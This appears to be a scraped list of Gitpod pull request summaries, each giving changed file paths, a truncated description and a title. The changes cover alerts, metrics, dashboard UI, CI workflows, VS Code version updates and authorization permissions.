- test/tests/workspace/process_priority_test.go
Fixes WKS-221
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [workspace] Test process priority

- components/ws-daemon/leeway.Dockerfile
fixes WKS-251
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Update ws-daemon gcloud dependency

- operations/observability/mixins/meta/rules/server.yaml
and add an internal version with even lower threshold for further improvements
Situation that we are trying to detect:
Fixes https://linear.app/gitpod/issue/WEB-607/bridge-crash-incident-crashloop-alert-did-not-fire
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [alerts] Reduce the threshold for WebAppServicesCrashlooping

- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/prometheus-metrics.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Report client-side metrics for all spicedb operations

- components/dashboard/src/menu/Menu.tsx
Experiment with moving the Gitpod icon away from the navigation to avoid clashing with the organization icon.
For more context, we also hide the Gitpod icon on smaller viewports, see https://github.com/gitpod-io/gitpod/pull/16618.
See [relevant discussion](https://gitpod.slack.com/archives/C01KPEPNBD0/p1688739652960249?thread_ts=1687263225.734219&cid=C01KPEPNBD0) (internal). Cc @jankeromnes @svenefftinge @mbrevoort
|-|-|
| <img width="1126" alt="Frame 1637" src="https://github.com/gitpod-io/gitpod/assets/120486/06a1d09a-5bd5-42c9-a40f-1f13a9e9b868"> | <img width="1126" alt="Frame 1638" src="https://github.com/gitpod-io/gitpod/assets/120486/bd84a7eb-2bb4-41d6-aa1e-a871a0d57b70"> |
1. Log in and see how the Gitpod logo is no longer clashing with the organization logo in …
> Move Gitpod icon away from the navigation

- components/server/src/messaging/redis-subscriber.ts
- components/server/src/prometheus-metrics.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Gauge for registered listeners

- components/gitpod-protocol/src/redis.ts
- components/ws-manager-bridge/src/bridge.ts
- components/ws-manager-bridge/src/redis/publisher.spec.ts
- components/ws-manager-bridge/src/workspace-instance-controller.ts
This will allow us to filter out the events if there are no subscribers for these, before we perform DB lookups for the data.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [ws-man-bridge] Publish ownerID for WorkspaceInstance updates WEB-597

- components/server/src/messaging/redis-subscriber.ts
Broadcast instance update events to clients, once received on Redis PubSub
* Depends on https://github.com/gitpod-io/gitpod/pull/18211
1. Preview
2. Enable feature flag
3. Start a workspace, client receives instance updates and workspace starts
<ul>
<li><b>🏷️ Name</b> - mp-server-8c0db2d6dc</li>
<li><b>🔗 URL</b> - <a href="https://mp-server-8c0db2d6dc.preview.gitpod-dev.com/workspaces" target="_blank">mp-server-8c0db2d6dc.preview.gitpod-dev.com/workspaces</a>.</li> …
> [server] Broadcast workspace instance update to listeners WEB-597

- test/pkg/integration/integration.go
- test/tests/components/ws-daemon/cpu_burst_test.go
* Fix rpc retries, to always `Instrument` first after closing the connection on failure, and to return when the call succeeds (was always calling the rpc 5 times before)
* Improve logging
Relates to WKS-153
https://github.com/gitpod-io/gitpod/actions/runs/5506674959
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [test] Fix RPC retries & improve logging

- .github/workflows/lacework-inline-scanner.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix lacework gh job

- operations/observability/mixins/meta/rules/server.yaml
This is the first stab at setting up alerts for Dedicated, after following [this guide](https://github.com/gitpod-io/gitpod-dedicated/tree/main/ops/telemetry/alerts).
More alerts blocked by:
- cannot setup alerts with `warning`, yet
- cannot setup alerts only for Dedicated, yet
/cc @kylos101 
As a result, I took the super-conservative path and only added the minimal set.
Fixes WEB-583
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [alerts] Add JsonRpcApiErrorRates and WebAppServicesCrashlooping to Dedicated

- components/gitpod-protocol/src/redis.ts
- components/server/src/messaging/redis-subscriber.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/ws-manager-bridge/src/prebuild-updater.ts
- components/ws-manager-bridge/src/redis/publisher.ts
* Depends on https://github.com/gitpod-io/gitpod/pull/18212
<ul>
<li><b>🏷️ Name</b> - mp-server-2a7cce3eb6</li>
<li><b>🔗 URL</b> - <a href="https://mp-server-2a7cce3eb6.preview.gitpod-dev.com/workspaces" target="_blank">mp-server-2a7cce3eb6.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - mp-server-prebuild-update-gha.13043</li>
</ul>
<details>
</details> …
> [server] Broadcast prebuild updates from redis WEB-599, WEB-593

- .github/workflows/preview-env-delete.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix preview environment delete job

- .github/workflows/build.yml
`GITHUB_STEP_SUMMARY` has a hard limit of 1024kb
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix summary length error

- components/supervisor/go.mod
- components/supervisor/go.sum
- components/supervisor/pkg/activation/activation.go
- components/supervisor/pkg/supervisor/docker.go
- components/supervisor/pkg/supervisor/supervisor.go
This PR:
- fix logging of docker-up to GCP that we can detect errors
- logs docker-up attempts to a file
- if docker-up or daemon is failing notifies a user about the issue and allow to inspect logs
- fix memory leaks with net epoll library
- stop activation if docker activation logging is bursting
Fix https://github.com/gitpod-io/gitpod/issues/18091 
Fix IDE-205
- Change dev/ide/example/workspace/.gitpod.yml to use default workspace image
- Run `./validate.sh --gitpod-env DOCKERD_ARGS=1` from `components/supervisor`
- When workspace is started
- In the host workspace run `sudo lsof > before.log` 
- In the inner workspace run `watch docker run hello-world` to trigger a docker activation, it should not hang anymore, but say that failed to connect to docker …
> [supervisor] improve docker activation

- .github/workflows/remove_runner.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix disposal of VMs

- operations/observability/mixins/meta/dashboards/components/server.json
See it here https://grafana.gitpod.io/d/server/gitpod-component-server?orgId=1
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Add Redis subscription/broadcasting to dashboard

- .github/workflows/build.yml
Based on https://github.com/gitpod-io/gitpod/pull/18228/.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix build previewctl step

- .github/workflows/build.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Use env variable directly

- .github/workflows/build.yml
Not needed, as the `pre-commit` check already executes this
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [ci] Remove license header check, already done in pre-commit

- components/ide/code/leeway.Dockerfile
Update the base image for native dependencies of VS Code Browser
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Update native dependencies base

- operations/observability/mixins/workspace/rules/central/nodes.yaml
Only trigger alerts when 2 or more nodes have high load average that is sustained over 1 for 60m.
Fixes WKS-301
We don't actually have data for when [this](https://grafana.gitpod.io/explore?left=%7B%22datasource%22:%22P4169E866C3094E38%22,%22queries%22:%5B%7B%22datasource%22:%7B%22type%22:%22prometheus%22,%22uid%22:%22P4169E866C3094E38%22%7D,%22expr%22:%22sum%20by%28nodepool%29%20%28count%20by%28node,%20nodepool%29%20%28sum%20by%28node,%20nodepool%29%20%28nodepool:node_load1:normalized%7Bnodepool%3D~%5C%22.%2Aworkspace.%2A%5C%22,%20cluster%21~%5C%22ephemeral.%2A%5C%22%7D%29%20%3E%3D%201%29%29%20%3E%3D%202%22,%22format%22:%22time_series%22,%22intervalFactor%22:2,%22refId%22:%22A%22,%22interval%22:%22%22,%22editorMode%22:%22builder%22,%22range%22:true,%22instant%22:true,%22hide%22:false,%22l …
> [obs] further restrict NodePoolLoad to avoid false positives

- .github/workflows/build.yml
The leeway issue is solved in v0.7.6
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Enable leeway metrics

- .github/workflows/code-nightly.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix invalid LEEWAY_WORKSPACE_ROOT

- operations/observability/mixins/workspace/dashboards/node-psi.json
Make it easier to observe PSI for one or more nodes
Related to WKS-303
Run CPU burn on many workspaces from a preview environment.
<ul>
<li><b>🏷️ Name</b> - kylos101-2t04q5vxdek</li>
<li><b>🔗 URL</b> - <a href="https://kylos101-2t04q5vxdek.preview.gitpod-dev.com/workspaces" target="_blank">kylos101-2t04q5vxdek.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - kylos101-2t04q5VxDek-gha.13309</li>
</ul>
<details> …
> [obs] add node variable and update panels in Node PSI dashboard to use it

- components/dashboard/src/admin/admin.routes.ts
Follow-up from WEB-171 and https://github.com/gitpod-io/gitpod/pull/17342, this will remove the remaining admin menu that has no child pages anymore.
Cc @easyCZ @geropl 
Fixes WEB-171
1. Login
2. Make your user admin
3. Go to the admin dashboard
4. Notice there's no settings menu
<ul>
<li><b>🏷️ Name</b> - gt-remove-71543b03eb</li>
<li><b>🔗 URL</b> - <a href="https://gt-remove-71543b03eb.preview.gitpod-dev.com/workspaces" target="_blank">gt-remove-71543b03eb.preview.gitpod-dev.com/workspaces</a>.</li> …
> Remove settings menu in the admin dashboard

- components/dashboard/src/user-settings/Integrations.tsx
Allow org owned users to disconnect all git providers.
Fixes WEB-619
To test this you can join my org on the preview env. w/ your google login by following this link:
https://brad-web-6a8b1c5163c.preview.gitpod-dev.com/login/brad
* Go to User Settings / Git Providers and connect to a provider.
* Verify you can disconnect from that provider even though it's the only connection you have.
<ul>
<li><b>🏷️ Name</b> - brad-web-6a8b1c5163c</li>
<li><b>🔗 URL</b> - <a href="https://brad-web-6a8b1c5163c.preview.gitpod-dev.com/workspaces" target="_blank">brad-web-6a8b1c5163c.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab …
> allow disconnect for org owned users

- components/public-api-server/pkg/apiv1/oidc_test.go
Remove debug logging of db ops
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [public-api] Remove db debug from OIDC tests

- .github/workflows/build.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Revert https://github.com/gitpod-io/gitpod/pull/18158

- components/supervisor/pkg/supervisor/services.go
Fixes [internal chat](https://gitpod.slack.com/archives/C045J13P8A1/p1689145467120339?thread_ts=1688971512.520299&cid=C045J13P8A1)
It should be able to connect with VS Code Desktop
<ul>
<li><b>🏷️ Name</b> - hw-correct88dd91db0a</li>
<li><b>🔗 URL</b> - <a href="https://hw-correct88dd91db0a.preview.gitpod-dev.com/workspaces" target="_blank">hw-correct88dd91db0a.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-correct-errror-code-gha.13357</li>
</ul> …
> [supervisor] correct CreateSSHKeyPair error code

- .github/workflows/build.yml
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Remove custom coverage-output-path

- install/installer/leeway.Dockerfile
And also allow us to remove the installation of dependencies
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Switch installer container image to chainguard

- .github/workflows/build.yml
Adds two steps to the build workflow.
1) Tag the release (if the build workflow runs on main we create a git tag on the commit we built)
2) Invoke "create release" workflow in gitpod-dedicated and pass on information about the git provenance.
The underlying idea is to create releases continuously and also be able to easily back track what code state a certain release is based.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [build-pipeline] tag the commit & create release

- components/dashboard/public/index.html
- components/dashboard/src/start/StartPage.tsx
- components/dashboard/src/teams/NewTeam.tsx
This will remove the — Gitpod suffix from all dashboard pages. Cc @chrifro 
| <img width="1070" alt="Frame 1698" src="https://github.com/gitpod-io/gitpod/assets/120486/b6ef5fd5-8a8c-4579-a94e-e60d890af68b"> | <img width="1070" alt="Frame 1699" src="https://github.com/gitpod-io/gitpod/assets/120486/9f5cc1b2-49c6-42fd-b21b-848e2afe1df1"> | 
VS Code on Browser is still using `— Gitpod Code` as a suffix which coule be probably also nice to remove.
Fixes WEB-626
Navigate through the dashboard and notice there's no `— Gitpod` suffix anywhere in the pages.
<ul>
<li><b>🏷️ Name</b> - gt-remove-8f99d3421b</li>
<li><b>🔗 URL</b> - <a href="https://gt-remove-8f99d3421b.preview.gitpod-dev.com/work …
> Remove page title suffix

- components/dashboard/src/components/Alert.tsx
- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
- Blocked by https://github.com/gitpod-io/website/pull/3800
Fixes #
- It should show warning when select VS Code Desktop in new workspace view https://hw-local-ssh-warning.preview.gitpod-dev.com/new
- It should hide if you add your userId to [configcat](https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=97590) and disable it
<ul>
<li><b>🏷️ Name</b> - hw-local-ssh-warning</li>
<li><b>🔗 URL</b> - <a href="https://hw-local-ssh-warning.preview.gitpod-dev.com/workspaces" target="_blank">hw-local-ssh-warning.preview.gitpod-dev.com/workspaces</a>.</li> …
> [dashboard] show warning when select code desktop

- install/installer/pkg/components/ide-metrics/configmap.go
- install/installer/pkg/components/workspace/ide/constants.go
Previously, errors reported from `gitpod-web` were labelled as `vscode-desktop-extension`. This PR allows us to rename that according to the platform we're dealing with: `vscode-browser-extension` 
Fixes IDE-226
<ul>
<li><b>🏷️ Name</b> - ide-gitpod123d5bd899</li>
<li><b>🔗 URL</b> - <a href="https://ide-gitpod123d5bd899.preview.gitpod-dev.com/workspaces" target="_blank">ide-gitpod123d5bd899.preview.gitpod-dev.com/workspaces</a>.</li> …
> Allow `vscode-browser-extension` to report errors

- components/server/src/analytics.ts
Aligns the cookieless tracking on the webapp with the webapp, which allows us to calculate page visitor to signup conversion for cookieless tracked visitors on the website.
Fixes [WEB-590](https://linear.app/gitpod/issue/WEB-590/remove-date-string-from-cookieless-id-in-segment-calls)
This cannot be tested in the preview environment as the client IP is read from headers added by the google load balancer. What you can do is go to [Segment's Trusted Debugger](https://app.segment.com/gitpod/sources/staging_trusted/debugger) and ensure that there is a page event with `anonymousId: unidentified-user` (which we default to when we don't have access to the client IP) when you open the preview environment. This ensures that our tracking didn't break because of the change.
<p>Gitpod was successfully …
> [Analytics] Remove date from input for cookieless hash

- components/gitpod-protocol/go/gitpod-service.go
- components/gitpod-protocol/src/protocol.ts
- components/server/src/workspace/config-provider.ts
- components/server/src/workspace/image-source-provider.ts
This removes the deprecated support for definitely-gp
Fixes https://github.com/gitpod-io/gitpod/issues/8473
Start a workspace on something that used to start off a definitely-go config and verify it starts from an inferred default config. E.g.
- https://se-remove-d35ec16651.preview.gitpod-dev.com/#https://github.com/microsoft/vscode
<ul>
<li><b>🏷️ Name</b> - se-remove-d35ec16651</li>
<li><b>🔗 URL</b> - <a href="https://se-remove-d35ec16651.preview.gitpod-dev.com/workspaces" target="_blank">se-remove-d35ec16651.preview.gitpod-dev.com/workspaces</a>.</li> …
> [server] remove definitely-gp

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
> Update VS Code Browser to `1.80.1`

- .github/pull_request_template.md
- .github/workflows/build.yml
<ul>
<li><b>🏷️ Name</b> - aledbf-concurrency</li>
<li><b>🔗 URL</b> - <a href="https://aledbf-concurrency.preview.gitpod-dev.com/workspaces" target="_blank">aledbf-concurrency.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - aledbf-concurrency-gha.13561</li>
</ul>
<details>
</details>
<details>
</details>
<details> …
> Change gh runners concurrency rules

- components/supervisor/pkg/supervisor/supervisor.go
Add more tunnel ssh logs
<ul>
<li><b>🏷️ Name</b> - test-991</li>
<li><b>🔗 URL</b> - <a href="https://test-991.preview.gitpod-dev.com/workspaces" target="_blank">test-991.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - test-991-gha.13591</li>
</ul>
<details>
</details>
<details>
</details>
<details>
Add …
> [supervisor] log ssh tunnel read error

- components/server/src/oauth-server/db.ts
Adds an OAuth client for the Desktop App experiment
A part of IDE-229
Try https://github.com/gitpod-io/gitpod-desktop-app-vite/pull/2 with it :)
<ul>
<li><b>🏷️ Name</b> - ide-gitpode87057719a</li>
<li><b>🔗 URL</b> - <a href="https://ide-gitpode87057719a.preview.gitpod-dev.com/workspaces" target="_blank">ide-gitpode87057719a.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - ide-gitpod-desktop-oauth-gha.13682</li>
</ul>
<details> …
> Add Gitpod Desktop OAuth client

- components/dashboard/src/App.tsx
- components/dashboard/src/app/AppRoutes.tsx
- components/dashboard/src/onboarding/LinkedInBanner.tsx
- components/server/src/linkedin-service.ts
This surfaces errors during the Connect w/ LinkedIn flow to the user via a toast vs. not showing them anything. It also fixes a bug where the `<LinkedInCallback/>` should be moved up to the top of the render tree so it's not prevented by any other blocking flows.
Fixes WEB-341
This one is tricky to test as it depends on an environment setup w/ the right secrets setup. Currently the preview environment for this PR has them setup, so you should be able to onboard and try to connect with linked in. Verify the flow works.
<ul>
<li><b>🏷️ Name</b> - brad-web-3c8ac4154b2</li>
<li><b>🔗 URL</b> - <a href="https://brad-web-3c8ac4154b2.preview.gitpod-dev.com/workspaces" target="_blank">brad-web-3c8ac4154b2.preview.gitpod-dev.com/wor …
> Fix LinkedIn connection bugs and surface errors

- components/dashboard/src/components/PillMenuItem.tsx
- components/dashboard/src/menu/OrganizationSelector.tsx
Reviving parts of https://github.com/gitpod-io/gitpod/pull/16433 to update the top navigation and tone down the active menu.
|-|-|
| <img width="565" alt="Frame 1712" src="https://github.com/gitpod-io/gitpod/assets/120486/985c7336-2e4d-4595-a330-41aa37df942d"> | <img width="565" alt="Frame 1713" src="https://github.com/gitpod-io/gitpod/assets/120486/ff57ef0a-f3c6-4443-b4a0-05aac7e7b61b"> |
| <img width="565" alt="Frame 1714" src="https://github.com/gitpod-io/gitpod/assets/120486/05fe117a-ab9d-4d2b-9c7c-287e257b1c0a"> | <img width="565" alt="Frame 1715" src="https://github.com/gitpod-io/gitpod/assets/120486/41884f22-db09-4ff9-b23a-8008bf2eccce"> |
| <img width="1512" alt="Frame 1716" src="https://github.com/gitpod-io/gitpod/assets/120486/589c1cc8-a0f3-49b6-9270-580b4389ea …
> Update top navigation

- components/gitpod-protocol/src/messaging/error.ts
- components/server/src/websocket/websocket-connection-manager.ts
This fixes an issue with missing `data` attribute propagation introduced in [PR 18113](https://github.com/gitpod-io/gitpod/pull/18113/files#r1268153249).
Fixes WEB-613
* given the current preview env, you should be able to see the link `Authorize with gitlab.gitpod-dev.com` if you follow https://at-fix-auth-with.preview.gitpod-dev.com/#https://gitlab.gitpod-dev.com/george/gitpod-spring-petclinic
<ul>
<li><b>🏷️ Name</b> - at-fix-auth-with</li>
<li><b>🔗 URL</b> - <a href="https://at-fix-auth-with.preview.gitpod-dev.com/workspaces" target="_blank">at-fix-auth-with.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31 …
> Fix: Authorize with undefined – WEB-613

- components/public-api-server/pkg/apiv1/workspace.go
- components/public-api-server/pkg/apiv1/workspace_test.go
See for context: https://gitpod.slack.com/archives/C03QM0ZHF5Z/p1689583726280819?thread_ts=1689581295.424429&cid=C03QM0ZHF5Z
Fixes #
It should able to start a workspace from prebuild with VS Code Desktop
<ul>
<li><b>🏷️ Name</b> - hw-fix-ctx</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-ctx.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-ctx.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-fix-ctx-gha.13658</li>
</ul>
<details> …
> [public-api] align context url with server

- components/dashboard/src/start/StartWorkspace.tsx
- Removes the latest ide alert warning on the workspace stopping and stopped pages and only shows it during workspace (re)start.
Fixes #11035 
```release-note
Removes the latest ide alert warning on the workspace stopping and stopped pages
```
<details>
</details>
<details>
</details>
> Hide the latest editor warning on stopping/stopped phases of a workspace

- components/gitpod-protocol/go/gitpod-service.go
- components/gitpod-protocol/src/protocol.ts
- components/server/src/workspace/config-provider.ts
- components/server/src/workspace/image-source-provider.ts
Reverts gitpod-io/gitpod#18316
> Revert "[server] remove definitely-gp"

- install/installer/pkg/components/public-api-server/configmap.go
- install/installer/pkg/config/v1/experimental/experimental.go
This PR makes the public URL endpoint configurable so we can use different publically accessible URLs to access OIDC endpoints. This is a necessary step to ensure limited connectivity from the internet in private networking mode in dedicated.
Fixes ENG-507
No
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Make public URL prefix configurable

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/lacework-inline-scanner.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- .werft/build.yaml
- .werft/cleanup-installer-tests.yaml
- .werft/debug.yaml
- .werft/platform-trigger-werft-cleanup.yaml
- dev/image/Dockerfile
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Install oci-tool in dev-environment image

- components/public-api-server/pkg/oidc/metrics.go
- components/public-api-server/pkg/oidc/router.go
- components/public-api-server/pkg/server/server.go
- components/server/src/auth/authenticator.ts
- components/server/src/auth/generic-auth-provider.ts
- components/server/src/auth/login-completion-handler.ts
- components/server/src/prometheus-metrics.ts
Fixes EXP-257
<ul>
<li><b>🏷️ Name</b> - mp-login-c1443c82549</li>
<li><b>🔗 URL</b> - <a href="https://mp-login-c1443c82549.preview.gitpod-dev.com/workspaces" target="_blank">mp-login-c1443c82549.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - mp-login-completed-metrics-gha.14155</li>
</ul>
<details>
</details>
<details>
</details> …
> [server, papi] Track login completed metrics by outcome, type WEB-461

- components/gitpod-protocol/src/messaging/error.ts
- components/server/src/workspace/env-var-service.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/server/src/workspace/headless-log-controller.ts
- components/server/src/workspace/workspace-starter.ts
We need to handle the not_found error during when projects are actually optional, i.e. during workspace start.
Fixes WEB-628
<ul>
<li><b>🏷️ Name</b> - se-start-wa387281c97</li>
<li><b>🔗 URL</b> - <a href="https://se-start-wa387281c97.preview.gitpod-dev.com/workspaces" target="_blank">se-start-wa387281c97.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-start-ws-wo-project-gha.14480</li>
</ul>
<details> …
> [server] don't error on project not_found

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
Update code to `1.81.0`
<ul>
<li><b>🏷️ Name</b> - ide-vscode-release</li>
<li><b>🔗 URL</b> - <a href="https://ide-vscode-release.preview.gitpod-dev.com/workspaces" target="_blank">ide-vscode-release.preview.gitpod-dev.com/workspaces</a>.</li> …
> Update VS Code Browser to `1.81.0`

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
> Update VS Code Browser to `1.81.1`

- components/ws-manager-mk2/cmd/sample-workspace/main.go
- components/ws-manager-mk2/config/manager/manager.yaml
- components/ws-manager-mk2/main.go
- install/installer/pkg/components/ws-manager-mk2/deployment.go
Reverts gitpod-io/gitpod#18419
The GRPC server is started even when the replica is not the leader and the maintenance configmap is not watched, only read once. This introduces an edge case when the maintenance mode is triggered, and we deploy a new version. The standby replica never gets the configmap update
> Revert "Enable leader election in ws-manager-mk2"

- components/server/src/authorization/authorizer.ts
- components/server/src/authorization/definitions.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/spicedb/schema/schema.yaml
This pull request adds a new feature to enable users to create snapshots of workspaces in an organization. It defines new relations and permissions in the `definitions.ts` and `schema.yaml` files, and implements the authorization logic in the `authorizer.ts` and `gitpod-server-impl.ts` files.
Fixes EXP-348
- Verify you can create a snapshot of a workspace using the preview env.
- Verify you can create a workspace from a snapshot. [click me](https://se-create-snapshot.preview.gitpod-dev.com#snapshot/196b0d05-0dc8-4fcb-a8c9-aa2b94f97102)
<ul>
<li><b>🏷️ Name</b> - se-create-snapshot</li>
<li><b>🔗 URL</b> - <a href="https://se-create-snapshot.preview.gitpod-dev.com/workspaces" …
> [fga] added create_snapshot permission

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
> Update VS Code Browser to `1.82.1`

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
> Update VS Code Browser to 1.82.2

- components/server/src/authorization/spicedb-authorizer.ts
- components/server/src/workspace/workspace-service.ts
When checks are disabled we still run the actual check and log it in case permission is not given. We also log when admission on workspaces are changed.
Refactor `SpiceDBAuthorizer` to separate permission and feature flag logic, and add logging for workspace admission level changes.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [fga] add more logging to track down sharing issue

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
Update code to `1.83.0`
<ul>
<li><b>🏷️ Name</b> - ft-code-stable</li>
<li><b>🔗 URL</b> - <a href="https://ft-code-stable.preview.gitpod-dev.com/workspaces" target="_blank">ft-code-stable.preview.gitpod-dev.com/workspaces</a>.</li> …
> VS Code Browser Release `1.83.0`

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
> Update VS Code Browser to `1.73.1`

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
Update code to `1.84.0`
Related https://github.com/gitpod-io/gitpod/issues/18969
<ul>
<li><b>🏷️ Name</b> - hw-release-184</li>
<li><b>🔗 URL</b> - <a href="https://hw-release-184.preview.gitpod-dev.com/workspaces" target="_blank">hw-release-184.preview.gitpod-dev.com/workspaces</a>.</li> …
> Gitpod VS Code Browser Release `1.84`

- WORKSPACE.yaml
- install/installer/pkg/components/workspace/ide/constants.go
Update code to `1.84.1`
Related https://github.com/gitpod-io/gitpod/issues/18969
<ul>
<li><b>🏷️ Name</b> - hw-code-1841</li>
<li><b>🔗 URL</b> - <a href="https://hw-code-1841.preview.gitpod-dev.com/workspaces" target="_blank">hw-code-1841.preview.gitpod-dev.com/workspaces</a>.</li> …
> Gitpod VS Code Browser Release `1.84.1`

- components/blobserve/leeway.Dockerfile
- components/content-service/leeway.Dockerfile
- components/dashboard/leeway.Dockerfile
- components/ee/agent-smith/leeway.Dockerfile
- components/ide-metrics/leeway.Dockerfile
- components/ide-proxy/Dockerfile
- components/ide-service/leeway.Dockerfile
- components/ide/jetbrains/backend-plugin/leeway.Dockerfile
- components/ide/jetbrains/image/leeway.Dockerfile
- components/ide/jetbrains/launcher/leeway.Dockerfile
- components/image-builder-mk3/leeway.Dockerfile
- components/leeway.Dockerfile
- components/local-app/leeway.Dockerfile
- components/node-labeler/leeway.Dockerfile
- components/openvsx-proxy/leeway.Dockerfile
- components/proxy/Dockerfile
- components/public-api-server/leeway.Dockerfile
- components/registry-facade/leeway.Dockerfile
- components/service-waiter/leeway.Dockerfile
- components/usage/leeway.Dockerfile
- components/ws-daemon/leeway.Dockerfile
- components/ws-daemon/seccomp-profile-installer/leeway.Dockerfile
- components/ws-manager-mk2/leeway.Dockerfile
- components/ws-proxy/leeway.Dockerfile
- dev/changelog/leeway.Dockerfile
- install/installer/leeway.Dockerfile
- test/leeway.Dockerfile
Update images digests using the latest version available for image/s
```release-note
NONE
```
> Update images digests

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/lacework-inline-scanner.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- dev/image/Dockerfile
This moves the installation location of pre-commit hooks into `/workspace` which makes them survive when creating workspaces from a prebuild (backup on restart in general.)
<ul>
<li><b>🏷️ Name</b> - at-pre-commit</li>
<li><b>🔗 URL</b> - <a href="https://at-pre-commit.preview.gitpod-dev.com/workspaces" target="_blank">at-pre-commit.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - at-pre-commit-gha.20989</li> …
> Install pre-commit hooks in prebuild

- components/gitpod-db/src/project-db.ts
- components/gitpod-db/src/typeorm/project-db-impl.ts
- components/server/src/projects/projects-service.ts
- components/server/src/workspace/context-service.ts
When creating a workspace, we check if by any chance there aren't multiple configurations for this repository, because we cannot just guess it by the context URL you provided. This lookup was previously done on a global level, so if anyone in the world configured a repo which you also had configured, you would start getting a `Multiple projects found for clone URL.` error.
This change tweaks the behavior so that even if you had a repo configured across two organizations, only the one for the currently active one will apply.
> [!IMPORTANT]  
> This PR does not address the same error message caused by multiple configurations of the same repo within a single organization. This will come later most likely via a `--configuration` flag for `gitpod workspace create`.
Fixes EXP-962
1. [Join my …
